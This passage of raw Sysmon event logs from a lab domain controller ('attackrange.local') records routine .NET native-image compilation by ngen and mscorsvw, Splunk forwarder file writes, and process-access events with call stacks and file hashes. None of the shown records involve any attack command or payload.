ws\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000023094Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:04.980{4DB9351A-A278-60D3-7305-00000000CF01}6388NT 
AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\ZFRQBH3EBZ\Microsoft.Transactions.Bridge.ni.dll.auxMD5=60F0300A5B52F2C5CA42E46FAF33F18E,SHA256=6EBFEDBB1351073E5D15D560CF6981E15422EA5C2E58D9425E4B9C0751129113,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000023093Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:04.980{4DB9351A-A278-60D3-7305-00000000CF01}6388NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\ZFRQBH3EBZ\Microsoft.Transactions.Bridge.ni.dllMD5=C544662BFD2C9566266AB23B47A47E57,SHA256=E7B252015CD0FA1FF2B6288BD0133380856293DAE416066B91FE0B5FEDC9E84F,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000023092Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:04.902{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-A278-60D3-7305-00000000CF01}6388C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000023091Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:04.902{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=08F27D16FBD5849C094DD1CBAB8B08D2,SHA256=FCDDCCCDCF971C6094B0672CFBAEA553BABD188BA7014232C168A58D06542710,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000023090Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:04.886{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A278-60D3-7305-00000000CF01}6388C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000023089Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:04.886{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A278-60D3-7305-00000000CF01}6388C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.3
0319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000023088Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:04.871{4DB9351A-A278-60D3-7205-00000000CF01}4584NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\NPMNVO2CYU\Microsoft.Tpm.Commands.ni.dll.auxMD5=86B3F44177E9226FE978812F150C0960,SHA256=B1BB393A2E3179365B55AB066E9A14AF1EA3C8911175ADB478A4CC865544F708,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000023087Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:04.871{4DB9351A-A278-60D3-7205-00000000CF01}4584NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\NPMNVO2CYU\Microsoft.Tpm.Commands.ni.dllMD5=A0F9AF5ABA3FD94F5FE745C8543A5D57,SHA256=E478D17FE4469EBD28000D1125F119063C66497A50B121DC7179D9FF07A21F80,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000023086Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:04.855{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=332C8EE5C48904FE33263CE23EDC3CAB,SHA256=4A1663EEB29C9E5FDFF04C2391D4527B7877A8ED0917A7987DDBC1EF4F2E8ED6,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000023085Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:07:04.841{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-A278-60D3-7205-00000000CF01}4584C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000023084Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:04.824{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9F48-60D3-DE00-00000000CF01}5812C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dl
l+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x800000000000000023083Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:04.824{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9F49-60D3-DF00-00000000CF01}5948C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 23542300x800000000000000023082Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:04.824{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1F695AFC2F70EE4B1159F26CF8FDE580,SHA256=80DB6576A27EFF72FB79C0732945F310BB4DC4208B39888B88F89FF96D9D3573,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000023081Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:04.824{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-9F49-60D3-DF00-00000000CF01}5948C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+74d7|C:\Windows\SYSTEM32\psmserviceexthost.dll+12fce|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x800000000000000023080Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:07:04.824{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-9F48-60D3-DE00-00000000CF01}5812C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x800000000000000023079Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:07:04.824{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-9F49-60D3-DF00-00000000CF01}5948C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x800000000000000023078Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:07:04.824{4DB9351A-9F2B-60D3-C500-00000000CF01}4544616C:\Windows\system32\sihost.exe{4DB9351A-9F49-60D3-DF00-00000000CF01}5948C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\usermgrcli.dll+1121|C:\Windows\System32\modernexecserver.dll+37dac|C:\Windows\System32\modernexecserver.dll+37d4f|C:\Windows\System32\modernexecserver.dll+375a6|C:\Windows\System32\modernexecserver.dll+1a1c4|C:\Windows\System32\modernexecserver.dll+3191d|C:\Windows\System32\modernexecserver.dll+32871|C:\Windows\System32\modernexecserver.dll+3278f|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000023077Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:04.808{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A278-60D3-7205-00000000CF01}4584C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000023076Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:07:04.808{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A278-60D3-7205-00000000CF01}4584C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000023075Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:04.808{4DB9351A-A278-60D3-7105-00000000CF01}7044NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\WZCAVDRLYD\Microsoft.Storage.Vds.ni.dll.auxMD5=889DCB1E0614980E1B8A94F17CA0BD69,SHA256=F0B3B1288913883C5EFCA26FF1F5C64FCE4AEA2D92282D7612E0D14F5A5D61E3,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x800000000000000023074Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:04.808{4DB9351A-A278-60D3-7105-00000000CF01}7044NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\WZCAVDRLYD\Microsoft.Storage.Vds.ni.dllMD5=E35758E18AA82743EC896E919021DA1F,SHA256=9AE15C1CD434F4B890343D7AD0B0686E8E03428618A56E3700D18593B6B5FA11,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000023073Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:04.761{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A278-60D3-7105-00000000CF01}7044C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000023072Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:04.714{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A278-60D3-7105-00000000CF01}7044C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000023071Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:07:04.714{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A278-60D3-7105-00000000CF01}7044C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000023070Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:04.714{4DB9351A-A278-60D3-7005-00000000CF01}5160NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\GTBIDSZZBE\Microsoft.Security.Powershell.Cmdlets.ni.dll.auxMD5=8D35F7D266C5D30C010C46E9C4245845,SHA256=199A28D5FB12DB5A8C57E08735C96841BC9DB1CD2BADEC761647666D1B947BA4,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x800000000000000023069Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:04.714{4DB9351A-A278-60D3-7005-00000000CF01}5160NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\GTBIDSZZBE\Microsoft.Security.Powershell.Cmdlets.ni.dllMD5=90E849D0E8E803F9558128E316131F46,SHA256=5AF90E76D0A9DDB2BD52E7D0E61F141A8C068112FE462DA5F30CC553A0B8D0B5,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000023068Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:04.683{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A278-60D3-7005-00000000CF01}5160C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e